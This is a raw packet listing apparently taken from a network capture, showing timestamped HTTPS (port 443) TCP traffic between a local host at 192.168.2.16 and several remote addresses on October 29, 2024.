                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.221349955 CET44349736192.0.76.3192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.221362114 CET44349722192.0.77.32192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.221410990 CET49738443192.168.2.16192.0.76.3
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.221420050 CET44349738192.0.76.3192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.221430063 CET49736443192.168.2.16192.0.76.3
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.221448898 CET49737443192.168.2.16192.0.76.3
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.221474886 CET49738443192.168.2.16192.0.76.3
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.221616983 CET49735443192.168.2.16192.0.76.3
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.221628904 CET44349735192.0.76.3192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.221760035 CET49738443192.168.2.16192.0.76.3
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.221774101 CET44349738192.0.76.3192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.221888065 CET44349719192.0.77.32192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.221918106 CET49737443192.168.2.16192.0.76.3
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.221936941 CET44349737192.0.76.3192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.221951962 CET44349719192.0.77.32192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.221997976 CET49719443192.168.2.16192.0.77.32
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.221999884 CET44349719192.0.77.32192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.222039938 CET49719443192.168.2.16192.0.77.32
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.222043037 CET49736443192.168.2.16192.0.76.3
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.222053051 CET44349736192.0.76.3192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.222291946 CET49719443192.168.2.16192.0.77.32
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.222307920 CET44349719192.0.77.32192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.224965096 CET44349721192.0.77.32192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.225003004 CET44349721192.0.77.32192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.225033045 CET49721443192.168.2.16192.0.77.32
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.225037098 CET44349721192.0.77.32192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.225053072 CET44349721192.0.77.32192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.225081921 CET49721443192.168.2.16192.0.77.32
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.225328922 CET44349721192.0.77.32192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.225358963 CET44349721192.0.77.32192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.225384951 CET49721443192.168.2.16192.0.77.32
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.225398064 CET44349721192.0.77.32192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.225449085 CET49721443192.168.2.16192.0.77.32
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.225455999 CET44349721192.0.77.32192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.226389885 CET49673443192.168.2.16204.79.197.203
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.227695942 CET44349722192.0.77.32192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.227755070 CET49722443192.168.2.16192.0.77.32
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.227762938 CET44349722192.0.77.32192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.227989912 CET44349722192.0.77.32192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.228033066 CET49722443192.168.2.16192.0.77.32
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.228039980 CET44349722192.0.77.32192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.228333950 CET44349722192.0.77.32192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.228363991 CET44349722192.0.77.32192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.228383064 CET49722443192.168.2.16192.0.77.32
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.228389978 CET44349722192.0.77.32192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.228431940 CET49722443192.168.2.16192.0.77.32
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.270598888 CET44349722192.0.77.32192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.272393942 CET49721443192.168.2.16192.0.77.32
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.272422075 CET44349721192.0.77.32192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.282365084 CET44349723192.0.73.2192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.282444000 CET44349723192.0.73.2192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.282490969 CET49723443192.168.2.16192.0.73.2
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.282501936 CET44349723192.0.73.2192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.282516003 CET44349723192.0.73.2192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.282555103 CET49723443192.168.2.16192.0.73.2
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.282737017 CET49723443192.168.2.16192.0.73.2
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.282748938 CET44349723192.0.73.2192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.318404913 CET49722443192.168.2.16192.0.77.32
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.318422079 CET44349722192.0.77.32192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.320394039 CET49721443192.168.2.16192.0.77.32
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.336910963 CET44349721192.0.77.32192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.339191914 CET44349722192.0.77.32192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.339253902 CET49722443192.168.2.16192.0.77.32
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.339270115 CET44349722192.0.77.32192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.343868017 CET44349721192.0.77.32192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.343925953 CET49721443192.168.2.16192.0.77.32
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.343930960 CET44349721192.0.77.32192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.343945026 CET44349721192.0.77.32192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.343982935 CET49721443192.168.2.16192.0.77.32
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.343993902 CET44349721192.0.77.32192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.344033957 CET44349721192.0.77.32192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.344063044 CET44349721192.0.77.32192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.344074011 CET49721443192.168.2.16192.0.77.32
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.344080925 CET44349721192.0.77.32192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.344103098 CET44349721192.0.77.32192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.344121933 CET49721443192.168.2.16192.0.77.32
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.344129086 CET44349721192.0.77.32192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.344168901 CET49721443192.168.2.16192.0.77.32
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.344175100 CET44349721192.0.77.32192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.344626904 CET44349722192.0.77.32192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.344681978 CET49722443192.168.2.16192.0.77.32
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.344691038 CET44349722192.0.77.32192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.344701052 CET44349722192.0.77.32192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.344746113 CET49722443192.168.2.16192.0.77.32
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.344753027 CET44349722192.0.77.32192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.387535095 CET44349722192.0.77.32192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.387584925 CET44349722192.0.77.32192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.387608051 CET49722443192.168.2.16192.0.77.32
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.387614965 CET44349722192.0.77.32192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.387624979 CET44349722192.0.77.32192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.387660980 CET49722443192.168.2.16192.0.77.32
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.387671947 CET44349722192.0.77.32192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.387712955 CET49722443192.168.2.16192.0.77.32
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.387718916 CET44349722192.0.77.32192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.397384882 CET49721443192.168.2.16192.0.77.32
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.397401094 CET44349721192.0.77.32192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.434173107 CET49722443192.168.2.16192.0.77.32
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.443403006 CET49721443192.168.2.16192.0.77.32
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.453368902 CET44349721192.0.77.32192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.454819918 CET44349722192.0.77.32192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.459690094 CET44349721192.0.77.32192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.459737062 CET44349721192.0.77.32192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.459774017 CET44349721192.0.77.32192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.459813118 CET49721443192.168.2.16192.0.77.32
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.459832907 CET44349721192.0.77.32192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.459847927 CET49721443192.168.2.16192.0.77.32
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.460113049 CET44349721192.0.77.32192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.460154057 CET44349721192.0.77.32192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.460185051 CET44349721192.0.77.32192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.460477114 CET49721443192.168.2.16192.0.77.32
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.460484982 CET44349721192.0.77.32192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.461009979 CET44349721192.0.77.32192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.461061001 CET49721443192.168.2.16192.0.77.32
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.461067915 CET44349721192.0.77.32192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.461977959 CET44349722192.0.77.32192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.462030888 CET44349722192.0.77.32192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.462038994 CET49722443192.168.2.16192.0.77.32
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.462054014 CET44349722192.0.77.32192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.462095022 CET49722443192.168.2.16192.0.77.32
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.462100029 CET44349722192.0.77.32192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.462150097 CET44349722192.0.77.32192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.462187052 CET49722443192.168.2.16192.0.77.32
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.462191105 CET44349722192.0.77.32192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.510829926 CET49721443192.168.2.16192.0.77.32
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.514281988 CET49722443192.168.2.16192.0.77.32
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.517101049 CET44349722192.0.77.32192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.517287970 CET44349722192.0.77.32192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.517374992 CET44349722192.0.77.32192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.517375946 CET49722443192.168.2.16192.0.77.32
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.517402887 CET44349722192.0.77.32192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.517446995 CET49722443192.168.2.16192.0.77.32
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.577840090 CET44349721192.0.77.32192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.577853918 CET44349721192.0.77.32192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.577977896 CET49721443192.168.2.16192.0.77.32
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.578123093 CET44349721192.0.77.32192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.578130007 CET44349721192.0.77.32192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.578191042 CET49721443192.168.2.16192.0.77.32
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.578248024 CET44349721192.0.77.32192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.578254938 CET44349721192.0.77.32192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.578295946 CET49721443192.168.2.16192.0.77.32
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.579199076 CET44349721192.0.77.32192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.579206944 CET44349721192.0.77.32192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.579291105 CET49721443192.168.2.16192.0.77.32
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.579442024 CET44349722192.0.77.32192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.579477072 CET44349722192.0.77.32192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.579518080 CET49722443192.168.2.16192.0.77.32
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.579662085 CET44349722192.0.77.32192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.579719067 CET49722443192.168.2.16192.0.77.32
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.579730034 CET44349722192.0.77.32192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.579777002 CET49722443192.168.2.16192.0.77.32
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.622603893 CET44349722192.0.77.32192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.622637987 CET44349722192.0.77.32192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.622735977 CET49722443192.168.2.16192.0.77.32
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.622785091 CET44349722192.0.77.32192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.622845888 CET49722443192.168.2.16192.0.77.32
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.622859001 CET44349722192.0.77.32192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.622906923 CET49722443192.168.2.16192.0.77.32
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.686018944 CET44349725192.0.77.32192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.686459064 CET49725443192.168.2.16192.0.77.32
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.686492920 CET44349725192.0.77.32192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.687596083 CET44349725192.0.77.32192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.687700033 CET49725443192.168.2.16192.0.77.32
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.687963009 CET49725443192.168.2.16192.0.77.32
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.688030005 CET44349725192.0.77.32192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.688148022 CET49725443192.168.2.16192.0.77.32
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.688155890 CET44349725192.0.77.32192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.691040993 CET44349726192.0.77.32192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.691255093 CET49726443192.168.2.16192.0.77.32
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.691279888 CET44349726192.0.77.32192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.692385912 CET44349726192.0.77.32192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.692476034 CET49726443192.168.2.16192.0.77.32
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.692729950 CET49726443192.168.2.16192.0.77.32
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.692792892 CET44349726192.0.77.32192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.692835093 CET49726443192.168.2.16192.0.77.32
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.696670055 CET44349721192.0.77.32192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.696686029 CET44349721192.0.77.32192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.696784973 CET49721443192.168.2.16192.0.77.32
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.696849108 CET44349722192.0.77.32192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.696929932 CET44349722192.0.77.32192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.696937084 CET49722443192.168.2.16192.0.77.32
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.696953058 CET44349722192.0.77.32192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.696984053 CET49722443192.168.2.16192.0.77.32
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.697004080 CET49722443192.168.2.16192.0.77.32
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.697103977 CET44349721192.0.77.32192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.697118998 CET44349721192.0.77.32192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.697174072 CET49721443192.168.2.16192.0.77.32
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.697180986 CET44349721192.0.77.32192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.697196007 CET44349721192.0.77.32192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.697240114 CET49721443192.168.2.16192.0.77.32
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.697909117 CET44349721192.0.77.32192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.697977066 CET49721443192.168.2.16192.0.77.32
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.711086988 CET44349731192.0.77.32192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.711424112 CET49731443192.168.2.16192.0.77.32
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.711436033 CET44349731192.0.77.32192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.712225914 CET44349727192.0.77.32192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.712414026 CET49727443192.168.2.16192.0.77.32
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.712426901 CET44349727192.0.77.32192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.712671041 CET44349731192.0.77.32192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.712749004 CET49731443192.168.2.16192.0.77.32
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.713079929 CET49731443192.168.2.16192.0.77.32
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.713152885 CET44349731192.0.77.32192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.713226080 CET49731443192.168.2.16192.0.77.32
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.713234901 CET44349731192.0.77.32192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.713470936 CET44349727192.0.77.32192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.713540077 CET49727443192.168.2.16192.0.77.32
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.713779926 CET49727443192.168.2.16192.0.77.32
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.713846922 CET44349727192.0.77.32192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.713910103 CET49727443192.168.2.16192.0.77.32
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.713917971 CET44349727192.0.77.32192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.735373974 CET44349726192.0.77.32192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.742516041 CET49725443192.168.2.16192.0.77.32
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.742518902 CET49726443192.168.2.16192.0.77.32
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.742537975 CET44349726192.0.77.32192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.758394003 CET49731443192.168.2.16192.0.77.32
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.758713961 CET49727443192.168.2.16192.0.77.32
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.790501118 CET49726443192.168.2.16192.0.77.32
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.867248058 CET44349722192.0.77.32192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.867479086 CET49722443192.168.2.16192.0.77.32
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.867541075 CET44349722192.0.77.32192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.867605925 CET49722443192.168.2.16192.0.77.32
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.867773056 CET44349722192.0.77.32192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.867830038 CET49722443192.168.2.16192.0.77.32
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.868547916 CET44349722192.0.77.32192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.868609905 CET49722443192.168.2.16192.0.77.32
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.868640900 CET44349722192.0.77.32192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.868693113 CET49722443192.168.2.16192.0.77.32
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.868705034 CET44349722192.0.77.32192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.868726969 CET44349722192.0.77.32192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.868788958 CET49722443192.168.2.16192.0.77.32
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.868918896 CET49722443192.168.2.16192.0.77.32
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.868937016 CET44349722192.0.77.32192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.883944035 CET44349721192.0.77.32192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.884000063 CET44349725192.0.77.32192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.884048939 CET49721443192.168.2.16192.0.77.32
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.884072065 CET44349725192.0.77.32192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.884113073 CET44349721192.0.77.32192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.884156942 CET49725443192.168.2.16192.0.77.32
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.884171009 CET49721443192.168.2.16192.0.77.32
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.884290934 CET44349726192.0.77.32192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.884361982 CET44349726192.0.77.32192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.884397030 CET44349726192.0.77.32192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.884428978 CET44349726192.0.77.32192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.884445906 CET49726443192.168.2.16192.0.77.32
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.884459972 CET44349726192.0.77.32192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.884480953 CET44349726192.0.77.32192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.884496927 CET49726443192.168.2.16192.0.77.32
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.884519100 CET44349726192.0.77.32192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.884526014 CET49726443192.168.2.16192.0.77.32
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.884531021 CET44349726192.0.77.32192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.884574890 CET49726443192.168.2.16192.0.77.32
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.884579897 CET44349726192.0.77.32192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.884593010 CET44349726192.0.77.32192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.884653091 CET49726443192.168.2.16192.0.77.32
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.884802103 CET44349721192.0.77.32192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.884867907 CET49721443192.168.2.16192.0.77.32
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.885457039 CET49725443192.168.2.16192.0.77.32
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.885474920 CET44349725192.0.77.32192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.885756969 CET44349721192.0.77.32192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.885802031 CET44349721192.0.77.32192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.885838032 CET49721443192.168.2.16192.0.77.32
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.885850906 CET44349721192.0.77.32192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.885868073 CET44349721192.0.77.32192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.885899067 CET49721443192.168.2.16192.0.77.32
